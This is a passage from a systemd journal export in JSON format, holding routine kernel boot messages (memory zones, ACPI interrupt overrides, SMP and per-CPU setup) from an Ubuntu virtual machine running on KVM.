"_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " Device empty" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=48;b=e2b08827b5804427b422c10c84f1567e;m=55841f;t=5bd16dd190387;x=6fd45817ea8b18ff", "__REALTIME_TIMESTAMP" : "1615280779887495", "__MONOTONIC_TIMESTAMP" : "5604383", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Movable zone start for each node" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=49;b=e2b08827b5804427b422c10c84f1567e;m=558439;t=5bd16dd1903a1;x=ea71b959dd5cf713", "__REALTIME_TIMESTAMP" : "1615280779887521", "__MONOTONIC_TIMESTAMP" : "5604409", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Early memory node ranges" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=4a;b=e2b08827b5804427b422c10c84f1567e;m=558444;t=5bd16dd1903ab;x=220b66ff95907466", "__REALTIME_TIMESTAMP" : "1615280779887531", "__MONOTONIC_TIMESTAMP" : "5604420", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " node 0: [mem 0x0000000000001000-0x000000000009efff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=4b;b=e2b08827b5804427b422c10c84f1567e;m=558451;t=5bd16dd1903b9;x=ebaa6321ff01d24f", "__REALTIME_TIMESTAMP" : "1615280779887545", "__MONOTONIC_TIMESTAMP" : "5604433", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " node 0: [mem 0x0000000000100000-0x000000007ffdbfff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=4c;b=e2b08827b5804427b422c10c84f1567e;m=55845b;t=5bd16dd1903c3;x=cecbae49965d8230", "__REALTIME_TIMESTAMP" : "1615280779887555", "__MONOTONIC_TIMESTAMP" : "5604443", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Reserved but unavailable: 98 pages" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=4d;b=e2b08827b5804427b422c10c84f1567e;m=558465;t=5bd16dd1903cc;x=4ad7a4d8f6cac2ef", "__REALTIME_TIMESTAMP" : "1615280779887564", "__MONOTONIC_TIMESTAMP" : "5604453", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Initmem setup node 0 [mem 0x0000000000001000-0x000000007ffdbfff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=4e;b=e2b08827b5804427b422c10c84f1567e;m=55846f;t=5bd16dd1903d6;x=39a566aa9c4d47fe", "__REALTIME_TIMESTAMP" : "1615280779887574", "__MONOTONIC_TIMESTAMP" : "5604463", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "On node 0 totalpages: 524154" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=4f;b=e2b08827b5804427b422c10c84f1567e;m=55847b;t=5bd16dd1903e3;x=b35787aecf128a45", "__REALTIME_TIMESTAMP" : "1615280779887587", "__MONOTONIC_TIMESTAMP" : "5604475", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " DMA zone: 64 pages used for memmap" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=50;b=e2b08827b5804427b422c10c84f1567e;m=558485;t=5bd16dd1903ed;x=774bf1c47c000e10", "__REALTIME_TIMESTAMP" : "1615280779887597", "__MONOTONIC_TIMESTAMP" : "5604485", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " DMA zone: 21 pages reserved" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=51;b=e2b08827b5804427b422c10c84f1567e;m=55848f;t=5bd16dd1903f7;x=cd8cce657b17ab84", "__REALTIME_TIMESTAMP" : "1615280779887607", "__MONOTONIC_TIMESTAMP" : "5604495", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " DMA zone: 3998 pages, LIFO batch:0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=52;b=e2b08827b5804427b422c10c84f1567e;m=558499;t=5bd16dd190401;x=9e81a5d794812128", "__REALTIME_TIMESTAMP" : "1615280779887617", "__MONOTONIC_TIMESTAMP" : "5604505", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " DMA32 zone: 8128 pages used for memmap" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=53;b=e2b08827b5804427b422c10c84f1567e;m=5584a3;t=5bd16dd19040b;x=1bfa40fc3d32423e", "__REALTIME_TIMESTAMP" : "1615280779887627", "__MONOTONIC_TIMESTAMP" : "5604515", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " DMA32 zone: 520156 pages, LIFO batch:31" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=54;b=e2b08827b5804427b422c10c84f1567e;m=5584ad;t=5bd16dd190415;x=28af2f6ab1436462", "__REALTIME_TIMESTAMP" : "1615280779887637", "__MONOTONIC_TIMESTAMP" : "5604525", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: PM-Timer IO Port: 0x608" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=55;b=e2b08827b5804427b422c10c84f1567e;m=5584b7;t=5bd16dd19041e;x=edf10699cb629bdf", "__REALTIME_TIMESTAMP" : "1615280779887646", "__MONOTONIC_TIMESTAMP" : "5604535", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "ACPI: Local APIC address 0xfee00000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=56;b=e2b08827b5804427b422c10c84f1567e;m=5584c1;t=5bd16dd190428;x=69ccfa8beb9c4d88", "__REALTIME_TIMESTAMP" : "1615280779887656", "__MONOTONIC_TIMESTAMP" : "5604545", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: LAPIC_NMI (acpi_id[0xff] dfl dfl lint[0x1])" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=57;b=e2b08827b5804427b422c10c84f1567e;m=5584cb;t=5bd16dd190432;x=f0a4d98fcffa2fec", "__REALTIME_TIMESTAMP" : "1615280779887666", "__MONOTONIC_TIMESTAMP" : "5604555", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "IOAPIC[0]: apic_id 0, version 17, address 0xfec00000, GSI 0-23" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=58;b=e2b08827b5804427b422c10c84f1567e;m=5584d5;t=5bd16dd19043d;x=9e51ba997007efbf", "__REALTIME_TIMESTAMP" : "1615280779887677", "__MONOTONIC_TIMESTAMP" : "5604565", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=59;b=e2b08827b5804427b422c10c84f1567e;m=5584df;t=5bd16dd190446;x=5903629783fb36b7", "__REALTIME_TIMESTAMP" : "1615280779887686", "__MONOTONIC_TIMESTAMP" : "5604575", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: INT_SRC_OVR (bus 0 bus_irq 5 global_irq 5 high level)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=5a;b=e2b08827b5804427b422c10c84f1567e;m=5584e9;t=5bd16dd190450;x=7df2e11a07cddc34", "__REALTIME_TIMESTAMP" : "1615280779887696", "__MONOTONIC_TIMESTAMP" : "5604585", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=5b;b=e2b08827b5804427b422c10c84f1567e;m=558514;t=5bd16dd19047b;x=443a95b1a9048bb8", "__REALTIME_TIMESTAMP" : "1615280779887739", "__MONOTONIC_TIMESTAMP" : "5604628", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: INT_SRC_OVR (bus 0 bus_irq 10 global_irq 10 high level)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=5c;b=e2b08827b5804427b422c10c84f1567e;m=558520;t=5bd16dd190488;x=7c23e11ae8bb2c84", "__REALTIME_TIMESTAMP" : "1615280779887752", "__MONOTONIC_TIMESTAMP" : "5604640", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: INT_SRC_OVR (bus 0 bus_irq 11 global_irq 11 high level)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=5d;b=e2b08827b5804427b422c10c84f1567e;m=55852a;t=5bd16dd190491;x=8b2a8fb05353fa39", "__REALTIME_TIMESTAMP" : "1615280779887761", "__MONOTONIC_TIMESTAMP" : "5604650", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "ACPI: IRQ0 used by override." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=5e;b=e2b08827b5804427b422c10c84f1567e;m=558533;t=5bd16dd19049a;x=6649cd755b60f860", "__REALTIME_TIMESTAMP" : "1615280779887770", "__MONOTONIC_TIMESTAMP" : "5604659", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "ACPI: IRQ5 used by override." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=5f;b=e2b08827b5804427b422c10c84f1567e;m=55853c;t=5bd16dd1904a3;x=d9afb5e94a1ac23d", "__REALTIME_TIMESTAMP" : "1615280779887779", "__MONOTONIC_TIMESTAMP" : "5604668", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "ACPI: IRQ9 used by override." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=60;b=e2b08827b5804427b422c10c84f1567e;m=558548;t=5bd16dd1904af;x=fc6da1e0ce4bb742", "__REALTIME_TIMESTAMP" : "1615280779887791", "__MONOTONIC_TIMESTAMP" : "5604680", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "ACPI: IRQ10 used by override." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=61;b=e2b08827b5804427b422c10c84f1567e;m=558551;t=5bd16dd1904b8;x=bcf5412d0124a136", "__REALTIME_TIMESTAMP" : "1615280779887800", "__MONOTONIC_TIMESTAMP" : "5604689", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "ACPI: IRQ11 used by override." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=62;b=e2b08827b5804427b422c10c84f1567e;m=55855a;t=5bd16dd1904c2;x=8336b9dc8a77e4ad", "__REALTIME_TIMESTAMP" : "1615280779887810", "__MONOTONIC_TIMESTAMP" : "5604698", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Using ACPI (MADT) for SMP configuration information" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=63;b=e2b08827b5804427b422c10c84f1567e;m=558574;t=5bd16dd1904db;x=7cb65efd0c394cd8", "__REALTIME_TIMESTAMP" : "1615280779887835", "__MONOTONIC_TIMESTAMP" : "5604724", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "smpboot: Allowing 1 CPUs, 0 hotplug CPUs" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=64;b=e2b08827b5804427b422c10c84f1567e;m=55857e;t=5bd16dd1904e5;x=d33aaab4a9483d0", "__REALTIME_TIMESTAMP" : "1615280779887845", "__MONOTONIC_TIMESTAMP" : "5604734", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "PM: Registered nosave memory: [mem 0x00000000-0x00000fff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=65;b=e2b08827b5804427b422c10c84f1567e;m=558588;t=5bd16dd1904ef;x=fe55dbea91cdda3b", "__REALTIME_TIMESTAMP" : "1615280779887855", "__MONOTONIC_TIMESTAMP" : "5604744", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "PM: Registered nosave memory: [mem 0x0009f000-0x0009ffff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=66;b=e2b08827b5804427b422c10c84f1567e;m=558591;t=5bd16dd1904f9;x=10e4fdbaa37c6f61", "__REALTIME_TIMESTAMP" : "1615280779887865", "__MONOTONIC_TIMESTAMP" : "5604753", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "PM: Registered nosave memory: [mem 0x000a0000-0x000effff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=67;b=e2b08827b5804427b422c10c84f1567e;m=5585af;t=5bd16dd190516;x=40e1de179b1f3444", "__REALTIME_TIMESTAMP" : "1615280779887894", "__MONOTONIC_TIMESTAMP" : "5604783", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "PM: Registered nosave memory: [mem 0x000f0000-0x000fffff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=68;b=e2b08827b5804427b422c10c84f1567e;m=5585c4;t=5bd16dd19052b;x=33b528785d423367", "__REALTIME_TIMESTAMP" : "1615280779887915", "__MONOTONIC_TIMESTAMP" : "5604804", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "e820: [mem 0x80000000-0xfeffbfff] available for PCI devices" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=69;b=e2b08827b5804427b422c10c84f1567e;m=5585db;t=5bd16dd190542;x=29dab73ca5d325d1", "__REALTIME_TIMESTAMP" : "1615280779887938", "__MONOTONIC_TIMESTAMP" : "5604827", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Booting paravirtualized kernel on KVM" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=6a;b=e2b08827b5804427b422c10c84f1567e;m=5585e4;t=5bd16dd19054c;x=a6da58fbae596331", "__REALTIME_TIMESTAMP" : "1615280779887948", "__MONOTONIC_TIMESTAMP" : "5604836", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "clocksource: refined-jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645519600211568 ns" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=6b;b=e2b08827b5804427b422c10c84f1567e;m=5585ed;t=5bd16dd190555;x=c98a8259479b7ba3", "__REALTIME_TIMESTAMP" : "1615280779887957", "__MONOTONIC_TIMESTAMP" : "5604845", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "MESSAGE" : "random: get_random_bytes called from start_kernel+0x99/0x4fd with crng_init=0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=6c;b=e2b08827b5804427b422c10c84f1567e;m=5585f7;t=5bd16dd19055e;x=257d9b7f616e4ee1", "__REALTIME_TIMESTAMP" : "1615280779887966", "__MONOTONIC_TIMESTAMP" : "5604855", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "setup_percpu: NR_CPUS:8192 nr_cpumask_bits:1 nr_cpu_ids:1 nr_node_ids:1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=6d;b=e2b08827b5804427b422c10c84f1567e;m=558600;t=5bd16dd190567;x=ee52472a4f3cd07c", "__REALTIME_TIMESTAMP" : "1615280779887975", "__MONOTONIC_TIMESTAMP" : "5604864", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "percpu: Embedded 46 pages/cpu s151552 r8192 d28672 u2097152" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=6e;b=e2b08827b5804427b422c10c84f1567e;m=55860c;t=5bd16dd190574;x=1636d8827d3d709f", "__REALTIME_TIMESTAMP" : "1615280779887988", "__MONOTONIC_TIMESTAMP" : "5604876", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "pcpu-alloc: s151552 r8192 d28672 u2097152 alloc=1*2097152" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=6f;b=e2b08827b5804427b422c10c84f1567e;m=558616;t=5bd16dd19057e;x=ff4d9ed204ab9f76", "__REALTIME_TIMESTAMP" : "1615280779887998", "__MONOTONIC_TIMESTAMP" : "5604886", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "pcpu-alloc: [0] 0 " } { "__CURSOR" : 